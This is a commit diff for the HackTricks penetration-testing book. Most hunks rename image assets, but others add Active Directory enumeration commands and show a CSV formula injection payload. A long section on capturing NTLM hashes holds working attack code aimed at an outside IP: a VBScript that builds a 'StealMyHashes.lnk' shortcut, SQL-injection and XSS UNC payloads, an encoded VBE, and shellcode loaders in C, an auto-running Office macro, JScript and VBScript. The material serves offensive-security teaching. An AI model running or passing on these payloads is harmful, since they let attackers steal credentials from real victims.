GitBook: [master] 12 pages and 24 assets modified
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
Before Width: | Height: | Size: 93 KiB After Width: | Height: | Size: 93 KiB |
Before Width: | Height: | Size: 93 KiB After Width: | Height: | Size: 93 KiB |
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
Before Width: | Height: | Size: 5.2 KiB After Width: | Height: | Size: 5.2 KiB |
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
Before Width: | Height: | Size: 4.6 KiB After Width: | Height: | Size: 4.6 KiB |
Before Width: | Height: | Size: 766 KiB After Width: | Height: | Size: 766 KiB |
Before Width: | Height: | Size: 766 KiB After Width: | Height: | Size: 766 KiB |
Before Width: | Height: | Size: 766 KiB After Width: | Height: | Size: 766 KiB |
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](.gitbook/assets/image%20%28182%29.png)
|
||||
|
||||
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) that will be reflected in this book.
|
||||
Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.
|
||||
|
||||
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
|
||||
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
|
|
|
@ -367,7 +367,7 @@ Partition Record Format:
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28413%29%20%281%29.png)
|
||||
![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%281%29.png)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
|
|
@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
@ -354,7 +354,7 @@ int main(int argc, char * argv[]) {
|
|||
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file `/.dockerinit` and this modified version uses `/etc/hostname`. **If the exploit isn't working** maybe you need to set a different file. To find a file that is mounted in the host just execute `mount` command:
|
||||
{% endhint %}
|
||||
|
||||
![](../../.gitbook/assets/image%20%28172%29.png)
|
||||
![](../../.gitbook/assets/image%20%28407%29.png)
|
||||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com/)\*\*\*\*
|
||||
|
||||
|
|
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
|||
|
||||
![](../../../.gitbook/assets/image%20%28211%29.png)
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
|
||||
|
||||
Because you will be able to call them
|
||||
|
||||
|
|
|
@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
|
|||
|
||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||
|
||||
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%281%29.png)
|
||||
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||
|
||||
|
|
|
@ -115,6 +115,8 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
|
|||
|
||||
### Manual
|
||||
|
||||
#### ldapsearch
|
||||
|
||||
Check null credentials or if your credentials are valid:
|
||||
|
||||
```bash
|
||||
|
@ -200,6 +202,51 @@ To see if you have access to any password you can use grep after executing one o
|
|||
|
||||
Please, notice that the passwords that you can find here could not be the real ones...
|
||||
|
||||
#### pbis
|
||||
|
||||
You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.
|
||||
**Pbis** allow you to get basic information easily:
|
||||
|
||||
```bash
|
||||
#Get known domains info
|
||||
./get-status
|
||||
./lsa get-status
|
||||
|
||||
#Get basic metrics
|
||||
./get-metrics
|
||||
./lsa get-metrics
|
||||
|
||||
#Get users
|
||||
./enum-users
|
||||
./lsa enum-users
|
||||
|
||||
#Get groups
|
||||
./enum-groups
|
||||
./lsa enum-groups
|
||||
|
||||
#Get all kind of objects
|
||||
./enum-objects
|
||||
./lsa enum-objects
|
||||
|
||||
#Get groups of a user
|
||||
./list-groups-for-user <username>
|
||||
./lsa list-groups-for-user <username>
|
||||
#Get gorups of each user
|
||||
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get users of a group
|
||||
./enum-members --by-name "domain admins"
|
||||
./lsa enum-members --by-name "domain admins"
|
||||
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get description of each user
|
||||
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
|
||||
echo "$line";
|
||||
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
|
||||
echo "======================"
|
||||
done
|
||||
```
|
||||
|
||||
## Graphical Interface
|
||||
|
||||
### Apache Directory
|
||||
|
|
|
@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28224%29.png)
|
||||
|
||||
|
|
|
@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
|||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
![](../.gitbook/assets/image%20%28253%29%20%281%29.png)
|
||||
![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29.png)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.
|
||||
|
|
|
@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
@ -102,7 +102,7 @@ find, findstr, [x]copy, move, replace, del, rename and many more!
|
|||
|
||||
## Auto-Complete
|
||||
|
||||
You just need to type ‘\\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||
|
||||
![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)
|
||||
|
||||
|
@ -160,9 +160,9 @@ We can create a shortcut containing our network path and as you as you open the
|
|||
Set shl = CreateObject("WScript.Shell")
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
currentFolder = shl.CurrentDirectory
|
||||
|
||||
|
||||
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
|
||||
|
||||
|
||||
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
||||
sc.WindowStyle = 1
|
||||
sc.HotKey = "Ctrl+Alt+O"
|
||||
|
@ -223,13 +223,13 @@ Start-Process \\192.168.0.1\aa
|
|||
IE will resolve UNC paths. For example
|
||||
|
||||
```text
|
||||
<img src="\\\\192.168.0.1\\aa">
|
||||
<img src="\\\\192.168.0.1\\aa">
|
||||
```
|
||||
|
||||
You can inject under XSS or in scenarios you find SQL injection. For example.
|
||||
|
||||
```text
|
||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||
```
|
||||
|
||||
## VBScript
|
||||
|
@ -258,7 +258,6 @@ Here’ the encoded version. You can encode and save this as something.vbe
|
|||
|
||||
```text
|
||||
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
||||
|
||||
```
|
||||
|
||||
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
||||
|
@ -343,9 +342,9 @@ Here’s a small shellcode I made. This shellcode uses CreateFile and tries to r
|
|||
# include <stdio.h>
|
||||
# include <string.h>
|
||||
# include <windows.h>
|
||||
|
||||
|
||||
int main() {
|
||||
|
||||
|
||||
char *shellcode =
|
||||
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
|
||||
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
|
||||
|
@ -370,21 +369,21 @@ int main() {
|
|||
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
|
||||
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
|
||||
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
|
||||
|
||||
|
||||
DWORD oldProtect;
|
||||
|
||||
|
||||
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
|
||||
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
|
||||
|
||||
|
||||
if (!ret) {
|
||||
fprintf(stderr, "%s", "Error Occured");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
|
||||
((void(*)(void))shellcode)();
|
||||
|
||||
|
||||
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
|
||||
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
```
|
||||
|
@ -403,7 +402,7 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
' Website: https://osandamalith
|
||||
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
|
||||
' This is a word/excel macro. This can be used in vb6 applications as well
|
||||
|
||||
|
||||
#If Vba7 Then
|
||||
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
|
||||
ByVal lpThreadAttributes As Long, _
|
||||
|
@ -412,19 +411,19 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
lpParameter As Long, _
|
||||
ByVal dwCreationFlags As Long, _
|
||||
lpThreadId As Long) As LongPtr
|
||||
|
||||
|
||||
|
||||
|
||||
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
|
||||
ByVal lpAddress As Long, _
|
||||
ByVal dwSize As Long, _
|
||||
ByVal flAllocationType As Long, _
|
||||
ByVal flProtect As Long) As LongPtr
|
||||
|
||||
|
||||
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
|
||||
ByVal Destination As LongPtr, _
|
||||
ByRef Source As Any, _
|
||||
ByVal Length As Long) As LongPtr
|
||||
|
||||
|
||||
#Else
|
||||
Private Declare Function CreateThread Lib "kernel32" ( _
|
||||
ByVal lpThreadAttributes As Long, _
|
||||
|
@ -433,22 +432,22 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
lpParameter As Long, _
|
||||
ByVal dwCreationFlags As Long, _
|
||||
lpThreadId As Long) As Long
|
||||
|
||||
|
||||
Private Declare Function VirtualAlloc Lib "kernel32" ( _
|
||||
ByVal lpAddress As Long, _
|
||||
ByVal dwSize As Long, _
|
||||
ByVal flAllocationType As Long, _
|
||||
ByVal flProtect As Long) As Long
|
||||
|
||||
|
||||
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
|
||||
ByVal Destination As Long, _
|
||||
ByRef Source As Any, _
|
||||
ByVal Length As Long) As Long
|
||||
#EndIf
|
||||
|
||||
|
||||
Const MEM_COMMIT = &H1000
|
||||
Const PAGE_EXECUTE_READWRITE = &H40
|
||||
|
||||
|
||||
Sub Auto_Open()
|
||||
Dim source As Long, i As Long
|
||||
#If Vba7 Then
|
||||
|
@ -456,7 +455,7 @@ Sub Auto_Open()
|
|||
#Else
|
||||
Dim lpMemory As Long, lResult As Long
|
||||
#EndIf
|
||||
|
||||
|
||||
Dim bShellcode(376) As Byte
|
||||
bShellcode(0) = 232
|
||||
bShellcode(1) = 255
|
||||
|
@ -514,10 +513,10 @@ DX = new ActiveXObject("DynamicWrapperX");
|
|||
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
|
||||
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
|
||||
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
|
||||
|
||||
|
||||
var MEM_COMMIT = 0x1000;
|
||||
var PAGE_EXECUTE_READWRITE = 0x40;
|
||||
|
||||
|
||||
var sc = [
|
||||
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
|
||||
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
|
||||
|
@ -538,7 +537,7 @@ var sc = [
|
|||
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
|
||||
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
|
||||
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
|
||||
|
||||
|
||||
var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i);
|
||||
var thread = DX.CreateThread(0,0,scLocation,0,0);
|
||||
|
@ -554,15 +553,15 @@ var thread = DX.CreateThread(0,0,scLocation,0,0);
|
|||
' Website: https://osandamalith.com
|
||||
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
|
||||
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
|
||||
|
||||
|
||||
Set DX = CreateObject("DynamicWrapperX")
|
||||
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
|
||||
DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
|
||||
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
|
||||
|
||||
|
||||
Const MEM_COMMIT = &H1000
|
||||
Const PAGE_EXECUTE_READWRITE = &H40
|
||||
|
||||
|
||||
shellcode = Array( _
|
||||
&He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _
|
||||
&H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _
|
||||
|
@ -583,13 +582,13 @@ shellcode = Array( _
|
|||
&H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _
|
||||
&H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _
|
||||
&H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05)
|
||||
|
||||
|
||||
scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||
|
||||
|
||||
For i =LBound(shellcode) to UBound(shellcode)
|
||||
DX.NumPut shellcode(i),scLocation,i
|
||||
Next
|
||||
|
||||
|
||||
thread = DX.CreateThread (0,0,scLocation,0,0)
|
||||
```
|
||||
|
||||
|
|